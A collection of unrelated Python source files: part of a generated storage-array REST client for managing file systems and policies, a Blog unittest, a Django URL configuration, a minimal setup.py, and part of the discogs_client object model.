:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: PolicyMemberResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_filesystem_policies_with_http_info(**kwargs)
else:
(data) = self.create_filesystem_policies_with_http_info(**kwargs)
return data
def create_filesystem_policies_with_http_info(self, **kwargs):
"""
Create a connection between a file system and a policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_filesystem_policies_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: PolicyMemberResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['policy_ids', 'policy_names', 'member_ids', 'member_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_filesystem_policies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems/policies', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PolicyMemberResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_file_systems(self, **kwargs):
"""
Delete a file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_file_systems(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param str name: The name of the file system or snapshot to be updated.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_file_systems_with_http_info(**kwargs)
else:
(data) = self.delete_file_systems_with_http_info(**kwargs)
return data
def delete_file_systems_with_http_info(self, **kwargs):
"""
Delete a file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_file_systems_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param str name: The name of the file system or snapshot to be updated.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ids', 'name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_file_systems" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ids' in params:
query_params.append(('ids', params['ids']))
collection_formats['ids'] = 'csv'
if 'name' in params:
query_params.append(('name', params['name']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_filesystem_policies(self, **kwargs):
"""
Delete a connection between a file system and a policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_filesystem_policies(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_filesystem_policies_with_http_info(**kwargs)
else:
(data) = self.delete_filesystem_policies_with_http_info(**kwargs)
return data
def delete_filesystem_policies_with_http_info(self, **kwargs):
"""
Delete a connection between a file system and a policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_filesystem_policies_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['policy_ids', 'policy_names', 'member_ids', 'member_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_filesystem_policies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems/policies', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_file_systems(self, **kwargs):
"""
List file systems.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_file_systems(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param int limit: limit, should be >= 0
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param bool total_only: Return only the total object.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_file_systems_with_http_info(**kwargs)
else:
(data) = self.list_file_systems_with_http_info(**kwargs)
return data
def list_file_systems_with_http_info(self, **kwargs):
"""
List file systems.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_file_systems_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param int limit: limit, should be >= 0
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param bool total_only: Return only the total object.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ids', 'names', 'filter', 'sort', 'start', 'limit', 'token', 'total_only']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_file_systems" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ids' in params:
query_params.append(('ids', params['ids']))
collection_formats['ids'] = 'csv'
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'token' in params:
query_params.append(('token', params['token']))
if 'total_only' in params:
query_params.append(('total_only', params['total_only']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileSystemResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_file_systems_performance(self, **kwargs):
"""
List instant or historical file system performance.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_file_systems_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int resolution: sample frequency in milliseconds
:param str protocol: to sample performance of a certain protocol
:param int end_time: Time to end sample in milliseconds since epoch.
:param str filter: The filter to be used for query.
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param int limit: limit, should be >= 0
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start_time: Time to start sample in milliseconds since epoch.
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param bool total_only: Return only the total object.
:return: FileSystemPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_file_systems_performance_with_http_info(**kwargs)
else:
(data) = self.list_file_systems_performance_with_http_info(**kwargs)
return data
def list_file_systems_performance_with_http_info(self, **kwargs):
"""
List instant or historical file system performance.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_file_systems_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int resolution: sample frequency in milliseconds
:param str protocol: to sample performance of a certain protocol
:param int end_time: Time to end sample in milliseconds since epoch.
:param str filter: The filter to be used for query.
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param int limit: limit, should be >= 0
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start_time: Time to start sample in milliseconds since epoch.
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param bool total_only: Return only the total object.
:return: FileSystemPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['resolution', 'protocol', 'end_time', 'filter', 'ids', 'limit', 'names', 'sort', 'start_time', 'start', 'token', 'total_only']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_file_systems_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'protocol' in params:
query_params.append(('protocol', params['protocol']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'ids' in params:
query_params.append(('ids', params['ids']))
collection_formats['ids'] = 'csv'
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
if 'total_only' in params:
query_params.append(('total_only', params['total_only']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileSystemPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_filesystem_policies(self, **kwargs):
"""
List policies attached to filesystems.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_filesystem_policies(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param int limit: limit, should be >= 0
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: PolicyMemberResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_filesystem_policies_with_http_info(**kwargs)
else:
(data) = self.list_filesystem_policies_with_http_info(**kwargs)
return data
def list_filesystem_policies_with_http_info(self, **kwargs):
"""
List policies attached to filesystems.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_filesystem_policies_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param int limit: limit, should be >= 0
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: PolicyMemberResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['policy_ids', 'policy_names', 'member_ids', 'member_names', 'filter', 'sort', 'start', 'limit', 'token']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_filesystem_policies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'token' in params:
query_params.append(('token', params['token']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems/policies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PolicyMemberResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_file_systems(self, attributes, **kwargs):
"""
Update an existing file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_file_systems(attributes, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param FileSystem attributes: The new attributes, only modifiable fields may be specified. (required)
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param str name: The name of the file system or snapshot to be updated.
:param bool discard_non_snapshotted_data: This parameter must be set to `true` in order to restore a file system from a snapshot or to demote a file system (which restores the file system from the common baseline snapshot). Setting this parameter to `true` is acknowledgement that any non-snapshotted data currently in the file system will be irretrievably lost.
:param bool delete_link_on_eradication: If set to `true`, the file system can be destroyed, even if it has a replica link. If set to `false`, the file system cannot be destroyed if it has a replica link. Defaults to `false`.
:param bool ignore_usage: Allow update operations that lead to a hard_limit_enabled file system with usage over its provisioned size. The update can be either setting hard_limit_enabled when usage is higher than provisioned size, or resize provisioned size to a value under usage when hard_limit_enabled is True.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_file_systems_with_http_info(attributes, **kwargs)
else:
(data) = self.update_file_systems_with_http_info(attributes, **kwargs)
return data
def update_file_systems_with_http_info(self, attributes, **kwargs):
"""
Update an existing file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_file_systems_with_http_info(attributes, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param FileSystem attributes: The new attributes, only modifiable fields may be specified. (required)
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param str name: The name of the file system or snapshot to be updated.
:param bool discard_non_snapshotted_data: This parameter must be set to `true` in order to restore a file system from a snapshot or to demote a file system (which restores the file system from the common baseline snapshot). Setting this parameter to `true` is acknowledgement that any non-snapshotted data currently in the file system will be irretrievably lost.
:param bool delete_link_on_eradication: If set to `true`, the file system can be destroyed, even if it has a replica link. If set to `false`, the file system cannot be destroyed if it has a replica link. Defaults to `false`.
:param bool ignore_usage: Allow update operations that lead to a hard_limit_enabled file system with usage over its provisioned size. The update can be either setting hard_limit_enabled when usage is higher than provisioned size, or resize provisioned size to a value under usage when hard_limit_enabled is True.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['attributes', 'ids', 'name', 'discard_non_snapshotted_data', 'delete_link_on_eradication', 'ignore_usage']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_file_systems" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'attributes' is set
if ('attributes' not in params) or (params['attributes'] is None):
raise ValueError("Missing the required parameter `attributes` when calling `update_file_systems`")
collection_formats = {}
path_params = {}
query_params = []
if 'ids' in params:
query_params.append(('ids', params['ids']))
collection_formats['ids'] = 'csv'
if 'name' in params:
query_params.append(('name', params['name']))
if 'discard_non_snapshotted_data' in params:
query_params.append(('discard_non_snapshotted_data', params['discard_non_snapshotted_data']))
if 'delete_link_on_eradication' in params:
query_params.append(('delete_link_on_eradication', params['delete_link_on_eradication']))
if 'ignore_usage' in params:
query_params.append(('ignore_usage', params['ignore_usage']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'attributes' in params:
body_params = params['attributes']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileSystemResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
import unittest
from app.models import Blog
class BlogTest(unittest.TestCase):
'''
Blog Class to test the behaviour of the Quote class
'''
def setUp(self):
'''
Set up method that will run before every Test
'''
self.new_blog = Blog('Apostle Paul', 'Labour in the Lord is not in vain')
def test_instance(self):
self.assertTrue(isinstance(self.new_blog,Blog))
|
"""techCourse URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('mainSite.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from setuptools import setup
setup(
name="mywhopackage",
install_requires=["django==1.0",],
extras_require={"test": ["pytest==2.0",], "docs": ["Sphinx==1.0",],},
)
|
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
from six import with_metaclass
from discogs_client.exceptions import HTTPError
from discogs_client.utils import parse_timestamp, update_qs, omit_none
class SimpleFieldDescriptor(object):
"""
An attribute that determines its value using the object's fetch() method.
If transform is a callable, the value will be passed through transform when
read. Useful for strings that should be ints, parsing timestamps, etc.
Shorthand for:
@property
def foo(self):
return self.fetch('foo')
"""
def __init__(self, name, writable=False, transform=None):
self.name = name
self.writable = writable
self.transform = transform
def __get__(self, instance, owner):
if instance is None:
return self
value = instance.fetch(self.name)
if self.transform:
value = self.transform(value)
return value
def __set__(self, instance, value):
if self.writable:
instance.changes[self.name] = value
return
raise AttributeError("can't set attribute")
class ObjectFieldDescriptor(object):
"""
An attribute that determines its value using the object's fetch() method,
and passes the resulting value through an APIObject.
If optional = True, the value will be None (rather than an APIObject
instance) if the key is missing from the response.
If as_id = True, the value is treated as an ID for the new APIObject rather
than a partial dict of the APIObject.
Shorthand for:
@property
def baz(self):
return BazClass(self.client, self.fetch('baz'))
"""
def __init__(self, name, class_name, optional=False, as_id=False):
self.name = name
self.class_name = class_name
self.optional = optional
self.as_id = as_id
def __get__(self, instance, owner):
if instance is None:
return self
wrapper_class = CLASS_MAP[self.class_name.lower()]
response_dict = instance.fetch(self.name)
if self.optional and not response_dict:
return None
if self.as_id:
# Response_dict wasn't really a dict. Make it so.
response_dict = {'id': response_dict}
return wrapper_class(instance.client, response_dict)
def __set__(self, instance, value):
raise AttributeError("can't set attribute")
class ListFieldDescriptor(object):
"""
An attribute that determines its value using the object's fetch() method,
and passes each item in the resulting list through an APIObject.
Shorthand for:
@property
def bar(self):
return [BarClass(self.client, d) for d in self.fetch('bar', [])]
"""
def __init__(self, name, class_name):
self.name = name
self.class_name = class_name
def __get__(self, instance, owner):
if instance is None:
return self
wrapper_class = CLASS_MAP[self.class_name.lower()]
return [wrapper_class(instance.client, d) for d in instance.fetch(self.name, [])]
def __set__(self, instance, value):
raise AttributeError("can't set attribute")
class ObjectCollectionDescriptor(object):
"""
An attribute that determines its value by fetching a URL to a paginated
list of related objects, and passes each item in the resulting list through
an APIObject.
Shorthand for:
@property
def frozzes(self):
return PaginatedList(self.client, self.fetch('frozzes_url'), 'frozzes', FrozClass)
"""
def __init__(self, name, class_name, url_key=None, list_class=None):
self.name = name
self.class_name = class_name
if url_key is None:
url_key = name + '_url'
self.url_key = url_key
if list_class is None:
list_class = PaginatedList
self.list_class = list_class
def __get__(self, instance, owner):
if instance is None:
return self
wrapper_class = CLASS_MAP[self.class_name.lower()]
return self.list_class(instance.client, instance.fetch(self.url_key), self.name, wrapper_class)
def __set__(self, instance, value):
raise AttributeError("can't set attribute")
class Field(object):
"""
A placeholder for a descriptor. Is transformed into a descriptor by the
APIObjectMeta metaclass when the APIObject classes are created.
"""
_descriptor_class = None
def __init__(self, *args, **kwargs):
self.key = kwargs.pop('key', None)
self.args = args
self.kwargs = kwargs
def to_descriptor(self, attr_name):
return self._descriptor_class(self.key or attr_name, *self.args, **self.kwargs)
class SimpleField(Field):
"""A field that just returns the value of a given JSON key."""
_descriptor_class = SimpleFieldDescriptor
class ListField(Field):
"""A field that returns a list of APIObjects."""
_descriptor_class = ListFieldDescriptor
class ObjectField(Field):
"""A field that returns a single APIObject."""
_descriptor_class = ObjectFieldDescriptor
class ObjectCollection(Field):
"""A field that returns a paginated list of APIObjects."""
_descriptor_class = ObjectCollectionDescriptor
class APIObjectMeta(type):
def __new__(cls, name, bases, dict_):
for k, v in dict_.items():
if isinstance(v, Field):
dict_[k] = v.to_descriptor(k)
return super(APIObjectMeta, cls).__new__(cls, name, bases, dict_)
class APIObject(with_metaclass(APIObjectMeta, object)):
def repr_str(self, string):
if sys.version_info < (3,):
return string.encode('utf-8')
return string
class PrimaryAPIObject(APIObject):
"""A first-order API object that has a canonical endpoint of its own."""
def __init__(self, client, dict_):
self.data = dict_
self.client = client
self._known_invalid_keys = []
self.changes = {}
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.id == other.id
return NotImplemented
def __ne__(self, other):
equal = self.__eq__(other)
return NotImplemented if equal is NotImplemented else not equal
def refresh(self):
if self.data.get('resource_url'):
data = self.client._get(self.data['resource_url'])
self.data.update(data)
self.changes = {}
def save(self):
if self.data.get('resource_url'):
# TODO: This should be PATCH
self.client._post(self.data['resource_url'], self.changes)
# Refresh the object, in case there were side-effects
self.refresh()
def delete(self):
if self.data.get('resource_url'):
self.client._delete(self.data['resource_url'])
def fetch(self, key, default=None):
